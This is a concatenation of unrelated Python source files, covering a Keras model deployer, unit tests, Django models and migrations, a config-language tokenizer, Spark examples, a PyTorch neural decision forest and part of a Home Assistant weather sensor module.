func) # save Keras model or copy the saved model into the image if isinstance(model_path_or_object, keras.Model): model_path_or_object.save(os.path.join(serialization_dir, "keras_model.h5")) elif os.path.isfile(model_path_or_object): try: shutil.copy(model_path_or_object, os.path.join(serialization_dir, "keras_model.h5")) except Exception as e: logger.error("Error copying keras model: %s" % e) raise e else: raise ClipperException( "%s should be wither a Keras Model object or a saved Model ('.h5')" % model_path_or_object) py_minor_version = (sys.version_info.major, sys.version_info.minor) # Check if Python 2 or Python 3 image if base_image == "default": if py_minor_version < (3, 0): logger.info("Using Python 2 base image") base_image = "{}/keras-container:{}".format( __registry__, __version__) elif py_minor_version == (3, 5): logger.info("Using Python 3.5 base image") base_image = "{}/keras35-container:{}".format( __registry__, __version__) elif py_minor_version == (3, 6): logger.info("Using Python 3.6 base image") base_image = "{}/keras36-container:{}".format( __registry__, __version__) else: msg = ( "Keras deployer only supports Python 2.7, 3.5, and 3.6. 
" "Detected {major}.{minor}").format( major=sys.version_info.major, minor=sys.version_info.minor) logger.error(msg) # Remove temp files shutil.rmtree(serialization_dir) raise ClipperException(msg) # Deploy model clipper_conn.build_and_deploy_model( name, version, input_type, serialization_dir, base_image, labels, registry, num_replicas, batch_size, pkgs_to_install) # Remove temp files shutil.rmtree(serialization_dir) <reponame>mozhumz/machine_learning_py<filename>tf_learn/weight_train/hyjTest.py import tensorflow as tf x = tf.constant([[1., 1.], [2., 2.]]) ss=tf.reduce_mean(x) with tf.Session() as sess: print(sess.run(ss)) import unittest import sys import os import json from gadio.text import text as text from gadio.models.radio import Radio class TestDependency(unittest.TestCase): def test_dependency(self): import math import os import sys import cv2 import numpy as np from cv2 import VideoWriter, VideoWriter_fourcc import moviepy.editor from PIL import Image, ImageDraw, ImageFont import gadio.configs import gadio.crawlers import gadio.media import gadio.models import gadio.text class TestText(unittest.TestCase): def test_find_suffix(self): self.assertEqual('.jpg', text.find_image_suffix('1.jpg')) self.assertEqual('.jpg', text.find_image_suffix('1.1.jpg')) self.assertEqual('', text.find_image_suffix(None)) def test_is_alpha(self): self.assertTrue(text.is_alpha("Hello")) self.assertFalse(text.is_alpha("12Hello")) self.assertFalse(text.is_alpha("是的")) def test_is_alnum(self): self.assertTrue(text.is_alnum('A')) self.assertFalse(text.is_alnum('.')) self.assertTrue(text.is_alnum('1')) self.assertFalse(text.is_alnum('是')) def test_seconds_to_time(self): self.assertEqual("00:00", text.seconds_to_time(0)) self.assertEqual("01:00", text.seconds_to_time(60)) self.assertEqual("-00:01", text.seconds_to_time(-1)) self.assertEqual("-00:01", text.seconds_to_time("a")) self.assertEqual("1:00:01", text.seconds_to_time(3601)) self.assertEqual("2:46:40", text.seconds_to_time(10000)) """ class RadioTest(unittest.TestCase): def test_radio(self): parsed_json = object with open(os.sep.join(['.', 'test', 'radio.json']), 'r', encoding='utf-8') as f: parsed_json = json.loads(f.read()) radio = Radio.load_from_json(parsed_json) self.assertEqual('112725', radio.radio_id) self.assertEqual('我们为何如此喜爱Metroidvania游戏', radio.title) self.assertEqual(81, len(radio.timeline)) self.assertEqual(4, len(radio.users)) if (0 in radio.timeline.keys()): self.assertTrue(len(radio.timestamps) == len(radio.timeline) + 1) else: self.assertTrue(len(radio.timestamps) == len(radio.timeline) + 2) """ if __name__ == "__main__": unittest.main() <gh_stars>10-100 # Generated by Django 3.1.6 on 2021-04-25 11:46 from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): initial = True dependencies = [ ('profileapp', '0001_initial'), ] operations = [ migrations.CreateModel( name='Document', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('document_name', models.CharField(max_length=20)), ('document_color', models.CharField(max_length=20)), ('document_map', models.CharField(max_length=100)), ('document_date', models.DateTimeField(auto_now_add=True)), ('document_liked', models.IntegerField(default=0)), ('document_private', models.BooleanField(default=False)), ('profile', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='document_profile', to='profileapp.profile')), ('profile_friend', 
models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='document_profile_friend', to='profileapp.profile')), ], ), ] <gh_stars>0 import unittest import time from pidevices.sensors.cytron_line_sensor_lss05_rpigpio import CytronLfLSS05Rpi class TestCytronLf(unittest.TestCase): def test_start(self): lf = CytronLfLSS05Rpi(14, 15, 18, 23, 24, cal=25) number = 1 self.assertEqual(lf.so_1, number, "Should be {}".format(number)) number = 2 self.assertEqual(lf.so_2, number, "Should be {}".format(number)) number = 3 self.assertEqual(lf.so_3, number, "Should be {}".format(number)) number = 4 self.assertEqual(lf.so_4, number, "Should be {}".format(number)) number = 5 self.assertEqual(lf.so_5, number, "Should be {}".format(number)) number = 6 self.assertEqual(lf.cal, number, "Should be {}".format(number)) lf.stop() def test_mode(self): lf = CytronLfLSS05Rpi(14, 15, 18, 23, 24, cal=25) print("Bright mode") lf.mode = 'bright' time.sleep(5) print("Dark mode") lf.mode = 'dark' lf.stop() def test_calibrate(self): lf = CytronLfLSS05Rpi(14, 15, 18, 23, 24, cal=25) lf.calibrate() def test_read(self): lf = CytronLfLSS05Rpi(14, 15, 18, 23, 24, cal=25) for i in range(20): print(lf.read()) time.sleep(1) if __name__ == "__main__": unittest.main() """!Tokenizer for the produtil.testing.parser module.""" import re import produtil.testing.utilities __all__=[ 'Token', 'end_of_line_type', 'end_of_text_type', 'Tokenizer', 'TokenizeFile' ] class Token(object): """!Represents one token in the tokenized version of a file.""" ##@var token_type # The type of token, a string ##@var token_value # The text that was tokenized, a string. ##@var filename # The file from which this token originates, a string. The # special value produtil.testing.utilities.unknown_file indicates # the file is unknown or the token is not from a file. ##@var lineno # The line from file filename fron which this token originates, an integer. # The special value -1 means the line is unknown. def __init__(self,token_type,token_value,filename,lineno): """!Constructor for Token @param token_type The type of token, a string @param token_value The text this token represents, a string. @param filename The name of the file from which this token originates or produtil.testing.utilities.unknown_file if unknown. @param lineno The integer line number, counting from 1, from which this token originates. Multi-line tokens should have a line number representative of the region the token originates, preferably on its first line. If the token is not from a file, the value should be -1.""" super(Token,self).__init__() self.token_type=token_type self.filename=filename self.lineno=lineno self.token_value=token_value def __repr__(self): """!A string representation of this token suitable for debugging. @returns Python code that would construct this token.""" return 'Token(%s,%s,%s,%s)'%( repr(self.token_type),repr(self.token_value), repr(self.filename),repr(self.lineno)) def __str__(self): """!A human-readable string representation of this token. @returns Python code that would construct this token.""" return 'Token(%s,%s,%s,%s)'%( repr(self.token_type),repr(self.token_value), repr(self.filename),repr(self.lineno)) ##@var end_of_line_type # The token_type parameter to send to Token.__init__() to indicate the # end of a line end_of_line_type='\n' ##@var end_of_text_type # The token_type parameter to send to Token.__init__() to indicate the # end of a file or string. 
end_of_text_type='' class Tokenizer(object): """!Tokenizes a file, turning it into a stream of Token objects for parsing.""" ##@var re # A compiled regular expression used to tokenize the file. def copy(self): """!Duplicates this object At present, a Tokenizer has no internal state information. Hence, this is equivalent to Tokenizer(). This may change in the future. Hence, if you want to copy a Tokenizer, you should use the copy() function. @returns A new empty Tokenizer.""" return Tokenizer() def __init__(self): """!Constructor for Tokenizer""" super(Tokenizer,self).__init__() #yell('compile\n') self.re=re.compile(r'''(?xs) ( (?P<comment> \# [^\r\n]+ (?: \r | \n )+ ) | (?P<commentend> \# [^\r\n]+ | \# ) $ | (?P<varname> [A-Za-z_] [A-Za-z_0-9.@]* (?: % [A-Za-z_][A-Za-z_0-9.@]* )* ) | (?P<hash>\#) | (?P<number> [+-]? [0-9]+\.[0-9]+ (?: [eE] [+-]? [0-9]+ )? | [+-]? \.[0-9]+ (?: [eE] [+-]? [0-9]+ )? | [+-]? [0-9]+\. (?: [eE] [+-]? [0-9]+ )? | [+-]? [0-9]+ (?: [eE] [+-]? [0-9]+ )? ) | (?P<empty_qstring> '' ) | (?P<empty_dqstring> "" ) | ' (?P<qstring> (?: [^'\\] | ( \\ . )+ ) * ) ' | " (?P<dqstring> (?: [^"\\] | ( \\ . )+ ) * ) " | \[\[\[ (?P<bracestring> (?: [^\]@] | @ (?!\[) | @ \[ @ \] | @ \[ ' [^']+ ' \] | @ \[ [^\]]+ \] | \]\] (?!\]) | \] (?!\]) ) *? ) \]\]\] | (?P<endline>[ \t]* [\r\n]+) | (?P<equalequal> == ) | (?P<equal> = ) | (?P<astrisk> \* ) | (?P<whitespace> [ \t]+ ) | (?P<lset>\{) | (?P<rset>\}) | (?P<lfort>\(/) | (?P<rfort>/\)) | (?P<lparen>\() | (?P<rparen>\)) | (?P<comma>,) | (?P<colon>:) | (?P<at>@) | (?P<oper>\.[a-zA-Z_][a-zA-Z0-9_.]*\.) | <=+ (?P<filter>[a-zA-Z_][a-zA-Z0-9_.]*) =+ | (?P<error> . ) )''') def tokenize(self,text,filename=produtil.testing.utilities.unknown_file, first_line=1): """!Tokenizes the specified file, acting as an iterator over Token objects. Loops over the text of the given file, creating Token objects and yielding them. @param text The text to tokenize. @param filename The file from which the text originates. This may be used for two purposes. The first is error reporting, and the second is "load" statements, which load files relative to the path to the current file. 
@param first_line The line number for the first line of the file.""" lineno=first_line for m in self.re.finditer(text): if m is None: raise ValueError('SHOULD NOT GET HERE: no match on "%s"'%(line,)) # else: # for dkey,dval in m.groupdict().iteritems(): # if dval is not None: # yell("%10s = %s\n"%(dkey,repr(dval))) if m.group('comment'): yield Token(end_of_line_type,m.group('comment'), filename,lineno) elif m.group('commentend'): yield Token(end_of_line_type,m.group('commentend'), filename,lineno) elif m.group('hash'): yield Token(end_of_line_type,m.group('commentend'), filename,lineno) elif m.group('endline'): yield Token(end_of_line_type,m.group('endline'), filename,lineno) elif m.group('oper'): yield Token('oper',m.group('oper'),filename,lineno) elif m.group('filter'): yield Token('oper','.'+m.group('filter')+'.',filename,lineno) elif m.group('varname'): yield Token('varname',m.group('varname'),filename,lineno) elif m.group('number'): yield Token('number',m.group('number'),filename,lineno) elif m.group('empty_qstring'): yield Token('qstring','',filename,lineno) elif m.group('empty_dqstring'): yield Token('dqstring','',filename,lineno) elif m.group('qstring'): yield Token('qstring',m.group('qstring'),filename,lineno) elif m.group('dqstring'): yield Token('dqstring',m.group('dqstring'),filename,lineno) elif m.group('bracestring'): yield Token('bracestring',m.group('bracestring'), filename,lineno) elif m.group('at'): yield Token('@','@',filename,lineno) elif m.group('equalequal'): yield Token('==','==',filename,lineno) elif m.group('equal'): yield Token('=','=',filename,lineno) elif m.group('comma'): yield Token(',',',',filename,lineno) elif m.group('colon'): yield Token(':',':',filename,lineno) elif m.group('lset'): yield Token('{','{',filename,lineno) elif m.group('rset'): yield Token('}','}',filename,lineno) elif m.group('lparen'): yield Token('(','(',filename,lineno) elif m.group('rparen'): yield Token(')',')',filename,lineno) elif m.group('lfort'): yield Token('(/','(/',filename,lineno) elif m.group('rfort'): yield Token('/)','/)',filename,lineno) elif m.group('whitespace'): pass # Ignore whitespace outside strings else: raise ValueError('%s:%d: invalid text %s'%( filename,lineno,repr(m.group(0)))) lineno+=m.group(0).count('\n') yield Token(end_of_text_type,'',filename,lineno) class TokenizeFile(object): """!Wrapper around a Tokenizer for a specified file. This is a convenience class; it is a wrapper around a Tokenizer, but also knows how to create new TokenizeFile objects for the same type of underlyting Tokenizer objects (for_file()).""" ##@var tokenizer # The Tokenizer object that turns text into sequences of Token objects. ##@var fileobj # A file-like object that produces text for the tokenizer ##@var filename # The name of the file that fileobj reads. ##@var first_line # The integer first line of the file, usually 1. def __init__(self,tokenizer,fileobj, filename=produtil.testing.utilities.unknown_file, first_line=1): """!Constructor for TokenizeFile @param tokenizer The Tokenizer-like object to parse. @param fileobj The opened file-like object to read. @param filename The file from which the text originates. This may be used for two purposes. The first is error reporting, and the second is "load" statements, which load files relative to the path to the current file. 
@param first_line The line number for the first line of the file.""" self.tokenizer=tokenizer self.fileobj=fileobj self.filename=filename self.first_line=first_line def for_file(self,fileobj,filename,first_line=1): """!Creates a new TokenizeFile object for the specified file. @param fileobj The file-like object to read. @param filename The file from which the text originates. This may be used for two purposes. The first is error reporting, and the second is "load" statements, which load files relative to the path to the current file. @param first_line The line number for the first line of the file.""" return TokenizeFile(self.tokenizer.copy(),fileobj,filename,first_line) def __iter__(self): """!Iterates over tokens in self.fileobj.""" text=self.fileobj.read() for token in self.tokenizer.tokenize( text,self.filename,self.first_line): yield token import sales_schema base_path="../../data/sales/" stores=sc.textFile(base_path+"stores*.txt").map(lambda x:sales_schema.Store().parse(x)) sales=sc.textFile(base_path+"sales_*.txt").map(lambda x:sales_schema.SaleRow().parse(x)) # -*- coding: utf-8 -*- """ TencentBlueKing is pleased to support the open source community by making 蓝鲸智云PaaS平台社区版 (BlueKing PaaSCommunity Edition) available. Copyright (C) 2017-2018 THL A29 Limited, a Tencent company. All rights reserved. Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://opensource.org/licenses/MIT Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. 
""" import json import zlib from django.db import models from django.utils.translation import ugettext_lazy as _ from common.constants import CHAT_BOT_TYPE_DEFAULT from common.constants import CHAT_BOT_TYPES from common.constants import TAK_PLATFORM_JOB from common.constants import TASK_EXECUTE_STATUS_CHOICES from common.constants import TASK_PLATFORM_CHOICES from module_biz.models import BaseModel class CompressJSONField(models.BinaryField): def __init__(self, compress_level=6, *args, **kwargs): super().__init__(*args, **kwargs) self.compress_level = compress_level def get_prep_value(self, value): value = super().get_prep_value(value) return zlib.compress(json.dumps(value).encode("utf-8"), self.compress_level) def to_python(self, value): value = super().to_python(value) return json.loads(zlib.decompress(value).decode("utf-8")) def from_db_value(self, value, expression, connection, context): return self.to_python(value) class Bot(BaseModel): """ 机器人 """ biz_id = models.PositiveIntegerField(_("业务ID"), default=0, db_index=True) biz_name = models.CharField(_("业务名称"), default="", max_length=128) bot_id = models.CharField(_("机器人ID"), default="", max_length=128) bot_name = models.CharField(_("机器人名称"), default="", max_length=128) bot_type = models.CharField( _("机器人类型"), default=CHAT_BOT_TYPE_DEFAULT, max_length=128, choices=CHAT_BOT_TYPES, ) config = CompressJSONField(verbose_name=_("机器人配置"), default={}) class Meta: verbose_name = _("【机器人】") verbose_name_plural = _("【机器人】") @classmethod def create_bot(cls, **kwargs): """ 创建机器人 """ return cls.objects.get_or_create(**kwargs) @classmethod def query_bot_list(cls, **kwargs): """ 获取机器人 """ return list(cls.objects.filter(**kwargs).order_by("-id").values()) @classmethod def update_bot(cls, bot_id, **kwargs): """ 更新机器人 """ cls.objects.filter(pk=bot_id).update(**kwargs) @classmethod def bulb_update_bot(cls, bot_ids, **kwargs): """ 批量更新机器人 """ cls.objects.filter(pk__in=bot_ids).update(**kwargs) class Intent(BaseModel): """ 用户意图 """ index_id = models.BigIntegerField(_("索引ID"), default=-1) biz_id = models.PositiveIntegerField(_("业务ID"), default=0, db_index=True) intent_name = models.CharField(_("技能名称"), default="", max_length=128) status = models.BooleanField(_("意图状态"), default=True) available_user = CompressJSONField(verbose_name=_("可执行用户"), default=[]) available_group = CompressJSONField(verbose_name=_("可执行群组"), default=[]) is_commit = models.BooleanField(_("执行确认"), default=True) class Meta: verbose_name = _("【意图】") verbose_name_plural = _("【意图】") @classmethod def query_intent_list(cls, **kwargs): """ 获取意图 """ return list(cls.objects.filter(**kwargs).order_by("-id").values()) @classmethod def create_intent(cls, **kwargs): """ 创建意图 """ return cls.objects.get_or_create(**kwargs) @classmethod def update_intent(cls, intent_id, **kwargs): """ 更新意图 """ cls.objects.filter(pk=intent_id).update(**kwargs) @classmethod def bulk_update_intent(cls, intent_ids, **kwargs): """ 批量更新意图 """ cls.objects.filter(pk__in=intent_ids).update(**kwargs) class Utterances(BaseModel): """ 语料信息 """ biz_id = models.PositiveIntegerField(_("业务ID"), default=0, db_index=True) index_id = models.BigIntegerField(_("索引ID"), default=-1) content = CompressJSONField(verbose_name=_("语料列表"), default=[]) class Meta: verbose_name = "【语料库】" verbose_name_plural = "【语料库】" @classmethod def query_utterances(cls, **kwargs): """ 获取语料 """ return list(cls.objects.filter(**kwargs).values()) @classmethod def create_utterance(cls, **kwargs): """ 创建语料 """ cls.objects.create(**kwargs) @classmethod def 
update_utterance(cls, intent_id, **kwargs): """ 更新语料 """ cls.objects.filter(index_id=intent_id).update(**kwargs) class Task(BaseModel): """ 任务 """ biz_id = models.PositiveIntegerField(_("业务ID"), default=0, db_index=True) index_id = models.BigIntegerField(_("索引ID"), default=-1) platform = models.CharField( _("平台名称"), default=TAK_PLATFORM_JOB, max_length=128, choices=TASK_PLATFORM_CHOICES, ) task_id = models.CharField( _("任务ID"), default=TAK_PLATFORM_JOB, max_length=128, ) activities = CompressJSONField(verbose_name=_("节点信息"), default=[]) slots = CompressJSONField(verbose_name=_("槽位信息"), default=[]) source = CompressJSONField(verbose_name=_("任务元数据"), default={}) script = models.TextField(_("执行脚本信息"), default="") class Meta: verbose_name = _("【任务信息】") verbose_name_plural = _("【任务信息】") @classmethod def query_task_list(cls, **kwargs): """ 获取任务列表 """ return list(cls.objects.filter(**kwargs).values()) @classmethod def create_task(cls, **kwargs): """ 创建任务 """ cls.objects.create(**kwargs) @classmethod def update_task(cls, intent_id, **kwargs): """ 更新任务 """ cls.objects.filter(index_id=intent_id).update(**kwargs) class ExecutionLog(BaseModel): """ 执行日志 """ biz_id = models.PositiveIntegerField(_("业务ID"), default=0, db_index=True) intent_id = models.BigIntegerField(_("意图ID"), default=-1) intent_name = models.CharField(_("技能名称"), default="", max_length=128) bot_name = models.CharField(_("机器人名称"), default="", max_length=128) bot_type = models.CharField(_("机器人类型"), default="default", max_length=128) platform = models.CharField(_("平台名称"), default="JOB", max_length=128) task_id = models.CharField(_("任务ID"), default="JOB", max_length=128) sender = models.CharField(_("执行人"), default="", max_length=128) msg = models.TextField(_("调用信息"), default="") status = models.CharField( _("任务状态"), default="0", max_length=128, choices=TASK_EXECUTE_STATUS_CHOICES, ) start_time = models.CharField(_("开始时间"), default="", max_length=256) end_time = models.CharField(_("结束时间"), default="", max_length=256) class Meta: verbose_name = _("【任务日志】") verbose_name_plural = _("【任务日志】") @classmethod def query_log_list(cls, **kwargs): """ 获取日志列表 """ return list(cls.objects.filter(**kwargs).values()) @classmethod def create_log(cls, **kwargs): """ 创建日志 """ log = cls.objects.create(**kwargs) return log @classmethod def update_log(cls, log_id, **kwargs): """ 更新日志 """ cls.objects.filter(pk=log_id).update(**kwargs) from pyspark.sql import SparkSession from pyspark.ml import Pipeline from pyspark.ml.classification import LogisticRegression from pyspark.ml.feature import HashingTF, Tokenizer from pyspark.sql import Row def main(): # Prepare training documents from a list of (id, text, label) tuples. spark = SparkSession.builder.appName("MLpipeline").getOrCreate() LabeledDocument = Row("id", "text", "label") training = spark.createDataFrame([ (0, "a b c d e spark", 1.0), (1, "b d", 0.0), (2, "spark f g h", 1.0), (3, "hadoop mapreduce", 0.0)], ["id", "text", "label"]) # Configure an ML pipeline, which consists of three stages: tokenizer, hashingTF, and lr. tokenizer = Tokenizer(inputCol="text", outputCol="words") hashingTF = HashingTF(inputCol=tokenizer.getOutputCol(), outputCol="features") lr = LogisticRegression(maxIter=10, regParam=0.01) pipeline = Pipeline(stages=[tokenizer, hashingTF, lr]) # Fit the pipeline to training documents. model = pipeline.fit(training) # Prepare test documents, which are unlabeled (id, text) tuples. 
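# Note: the fitted PipelineModel re-applies the same Tokenizer and HashingTF
# stages to any new DataFrame before scoring it with the trained
# LogisticRegression, so the test data below only needs raw "id" and "text" columns.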
test = spark.createDataFrame([ (4, "spark i j k"), (5, "l m n"), (6, "mapreduce spark"), (7, "apache hadoop")], ["id", "text"]) # Make predictions on test documents and print columns of interest. prediction = model.transform(test) selected = prediction.select("id", "text", "prediction") for row in selected.collect(): print(row) if __name__ == '__main__': main() <reponame>kkk669/VisualizingNDF<filename>src/age_estimation/ndf.py import resnet import torch import torch.nn as nn from torch.nn.parameter import Parameter from collections import OrderedDict import numpy as np # smallest positive float number FLT_MIN = float(np.finfo(np.float32).eps) FLT_MAX = float(np.finfo(np.float32).max) class FeatureLayer(nn.Sequential): def __init__(self, model_type = 'resnet34', num_output = 256, input_size = 224, pretrained = False, gray_scale = False): """ Args: model_type (string): type of model to be used. num_output (int): number of neurons in the last feature layer input_size (int): input image size pretrained (boolean): whether to use a pre-trained model from ImageNet gray_scale (boolean): whether the input is gray scale image """ super(FeatureLayer, self).__init__() self.model_type = model_type self.num_output = num_output if self.model_type == 'hybrid': # a model using a resnet-like backbone is used for feature extraction model = resnet.Hybridmodel(self.num_output) self.add_module('hybrid_model', model) else: raise NotImplementedError def get_out_feature_size(self): return self.num_output class Tree(nn.Module): def __init__(self, depth, feature_length, vector_length, use_cuda = True): """ Args: depth (int): depth of the neural decision tree. feature_length (int): number of neurons in the last feature layer vector_length (int): length of the mean vector stored at each tree leaf node use_cuda (boolean): whether to use GPU """ super(Tree, self).__init__() self.depth = depth self.n_leaf = 2 ** depth self.feature_length = feature_length self.vector_length = vector_length self.is_cuda = use_cuda onehot = np.eye(feature_length) # randomly use some neurons in the feature layer to compute decision function using_idx = np.random.choice(feature_length, self.n_leaf, replace=False) self.feature_mask = onehot[using_idx].T self.feature_mask = Parameter(torch.from_numpy(self.feature_mask).type(torch.FloatTensor),requires_grad=False) # a leaf node contains a mean vector and a covariance matrix self.mean = np.ones((self.n_leaf, self.vector_length)) # TODO: use k-means clustering to perform leaf node initialization self.mu_cache = [] # use sigmoid function as the decision function self.decision = nn.Sequential(OrderedDict([ ('sigmoid', nn.Sigmoid()), ])) # used for leaf node update self.covmat = np.array([np.eye(self.vector_length) for i in range(self.n_leaf)]) # also stores the inverse of the covariance matrix for efficiency self.covmat_inv = np.array([np.eye(self.vector_length) for i in range(self.n_leaf)]) # also stores the determinant of the covariance matrix for efficiency self.factor = np.ones((self.n_leaf)) if not use_cuda: raise NotImplementedError else: self.mean = Parameter(torch.from_numpy(self.mean).type(torch.FloatTensor).cuda(), requires_grad=False) self.covmat = Parameter(torch.from_numpy(self.covmat).type(torch.FloatTensor).cuda(), requires_grad=False) self.covmat_inv = Parameter(torch.from_numpy(self.covmat_inv).type(torch.FloatTensor).cuda(), requires_grad=False) self.factor = Parameter(torch.from_numpy(self.factor).type(torch.FloatTensor).cuda(), requires_grad=False) def forward(self, x, 
save_flag = False): """ Args: param x (Tensor): input feature batch of size [batch_size, n_features] Return: (Tensor): routing probability of size [batch_size, n_leaf] """ cache = {} if x.is_cuda and not self.feature_mask.is_cuda: self.feature_mask = self.feature_mask.cuda() feats = torch.mm(x, self.feature_mask) decision = self.decision(feats) decision = torch.unsqueeze(decision,dim=2) decision_comp = 1-decision decision = torch.cat((decision,decision_comp),dim=2) # save some intermediate results for analysis if needed if save_flag: cache['decision'] = decision[:,:,0] batch_size = x.size()[0] mu = x.data.new(batch_size,1,1).fill_(1.) begin_idx = 1 end_idx = 2 for n_layer in range(0, self.depth): # mu stores the probability that a sample is routed to certain node # repeat it to be multiplied for left and right routing mu = mu.repeat(1, 1, 2) # the routing probability at n_layer _decision = decision[:, begin_idx:end_idx, :] # -> [batch_size,2**n_layer,2] mu = mu*_decision # -> [batch_size,2**n_layer,2] begin_idx = end_idx end_idx = begin_idx + 2 ** (n_layer+1) # merge left and right nodes to the same layer mu = mu.view(batch_size, -1, 1) mu = mu.view(batch_size, -1) if save_flag: cache['mu'] = mu return mu, cache else: return mu def pred(self, x): p = torch.mm(self(x), self.mean) return p def update_label_distribution(self, target_batch, check=False): """ fix the feature extractor of RNDF and update leaf node mean vectors and covariance matrices based on a multivariate gaussian distribution Args: param target_batch (Tensor): a batch of regression targets of size [batch_size, vector_length] """ target_batch = torch.cat(target_batch, dim = 0) mu = torch.cat(self.mu_cache, dim = 0) batch_size = len(mu) # no need for gradient computation with torch.no_grad(): leaf_prob_density = mu.data.new(batch_size, self.n_leaf) for leaf_idx in range(self.n_leaf): # vectorized code is used for efficiency temp = target_batch - self.mean[leaf_idx, :] leaf_prob_density[:, leaf_idx] = (self.factor[leaf_idx]*torch.exp(-0.5*(torch.mm(temp, self.covmat_inv[leaf_idx, :,:])*temp).sum(dim = 1))).clamp(FLT_MIN, FLT_MAX) # Tensor [batch_size, 1] nominator = (mu * leaf_prob_density).clamp(FLT_MIN, FLT_MAX) # [batch_size, n_leaf] denomenator = (nominator.sum(dim = 1).unsqueeze(1)).clamp(FLT_MIN, FLT_MAX) # add dimension for broadcasting zeta = nominator/denomenator # [batch_size, n_leaf] # new_mean if a weighted sum of all training samples new_mean = (torch.mm(target_batch.transpose(0, 1), zeta)/(zeta.sum(dim = 0).unsqueeze(0))).transpose(0, 1) # [n_leaf, vector_length] # allocate for new parameters new_covmat = new_mean.data.new(self.n_leaf, self.vector_length, self.vector_length) new_covmat_inv = new_mean.data.new(self.n_leaf, self.vector_length, self.vector_length) new_factor = new_mean.data.new(self.n_leaf) for leaf_idx in range(self.n_leaf): # new covariance matrix is a weighted sum of all covmats of each training sample weights = zeta[:, leaf_idx].unsqueeze(0) temp = target_batch - new_mean[leaf_idx, :] new_covmat[leaf_idx, :,:] = torch.mm(weights*(temp.transpose(0, 1)), temp)/(weights.sum()) # update cache (factor and inverse) for future use new_covmat_inv[leaf_idx, :,:] = new_covmat[leaf_idx, :,:].inverse() if check and new_covmat[leaf_idx, :,:].det() <= 0: print('Warning: singular matrix %d'%leaf_idx) new_factor[leaf_idx] = 1.0/max((torch.sqrt(new_covmat[leaf_idx, :,:].det())), FLT_MIN) # update parameters self.mean = Parameter(new_mean, requires_grad = False) self.covmat = Parameter(new_covmat, requires_grad = 
False) self.covmat_inv = Parameter(new_covmat_inv, requires_grad = False) self.factor = Parameter(new_factor, requires_grad = False) return class Forest(nn.Module): # a neural decision forest is an ensemble of neural decision trees def __init__(self, n_tree, tree_depth, feature_length, vector_length, use_cuda = False): super(Forest, self).__init__() self.trees = nn.ModuleList() self.n_tree = n_tree self.tree_depth = tree_depth self.feature_length = feature_length self.vector_length = vector_length for _ in range(n_tree): tree = Tree(tree_depth, feature_length, vector_length, use_cuda) self.trees.append(tree) def forward(self, x, save_flag = False): predictions = [] cache = [] for tree in self.trees: if save_flag: # record some intermediate results mu, cache_tree = tree(x, save_flag = True) p = torch.mm(mu, tree.mean) cache.append(cache_tree) else: p = tree.pred(x) predictions.append(p.unsqueeze(2)) prediction = torch.cat(predictions,dim=2) prediction = torch.sum(prediction, dim=2)/self.n_tree if save_flag: return prediction, cache else: return prediction class NeuralDecisionForest(nn.Module): def __init__(self, feature_layer, forest): super(NeuralDecisionForest, self).__init__() self.feature_layer = feature_layer self.forest = forest def forward(self, x, debug = False, save_flag = False): feats, reg_loss = self.feature_layer(x) if save_flag: # return some intermediate results pred, cache = self.forest(feats, save_flag = True) return pred, reg_loss, cache else: pred = self.forest(feats) return pred, reg_loss <reponame>boojew/home-assistant """ Support for Ambient Weather Station Service. For more details about this platform, please refer to the documentation at https://home-assistant.io/components/sensor.ambient_station/ """ import asyncio from datetime import timedelta import logging import voluptuous as vol from homeassistant.components.sensor import PLATFORM_SCHEMA from homeassistant.const import CONF_API_KEY, CONF_MONITORED_CONDITIONS import homeassistant.helpers.config_validation as cv from homeassistant.helpers.entity import Entity from homeassistant.util import Throttle REQUIREMENTS = ['ambient_api==1.5.2'] CONF_APP_KEY = 'app_key' SENSOR_NAME = 0 SENSOR_UNITS = 1 CONF_UNITS = 'units' UNITS_US = 'us' UNITS_SI = 'si' UNIT_SYSTEM = {UNITS_US: 0, UNITS_SI: 1} SCAN_INTERVAL = timedelta(seconds=300) SENSOR_TYPES = { 'winddir': ['Wind Dir', '°'], 'windspeedmph': ['Wind Speed', 'mph'], 'windgustmph': ['Wind Gust', 'mph'], 'maxdailygust': ['Max Gust', 'mph'], 'windgustdir': ['Gust Dir', '°'], 'windspdmph_avg2m': ['Wind Avg 2m', 'mph'], 'winddir_avg2m': ['Wind Dir Avg 2m', 'mph'], 'windspdmph_avg10m': ['Wind Avg 10m', 'mph'], 'winddir_avg10m': ['Wind Dir Avg 10m', '°'], 'humidity': ['Humidity', '%'], 'humidityin': ['Humidity In', '%'], 'tempf': ['Temp', ['°F', '°C']], 'tempinf': ['Inside Temp', ['°F', '°C']], 'battout': ['Battery', ''], 'hourlyrainin': ['Hourly Rain Rate', 'in/hr'], 'dailyrainin': ['Daily Rain', 'in'], '24hourrainin': ['24 Hr Rain', 'in'], 'weeklyrainin': ['Weekly Rain', 'in'], 'monthlyrainin': ['Monthly Rain', 'in'], 'yearlyrainin': ['Yearly Rain', 'in'], 'eventrainin': ['Event Rain', 'in'], 'totalrainin': ['Lifetime Rain', 'in'], 'baromrelin': ['Rel Pressure', 'inHg'], 'baromabsin': ['Abs Pressure', 'inHg'], 'uv': ['uv', 'Index'], 'solarradiation': ['Solar Rad', 'W/m^2'], 'co2': ['co2', 'ppm'], 'lastRain': ['Last Rain', ''], 'dewPoint': ['Dew Point', ['°F', '°C']], 'feelsLike': ['Feels Like', ['°F', '°C']], } _LOGGER = logging.getLogger(__name__) PLATFORM_SCHEMA = 
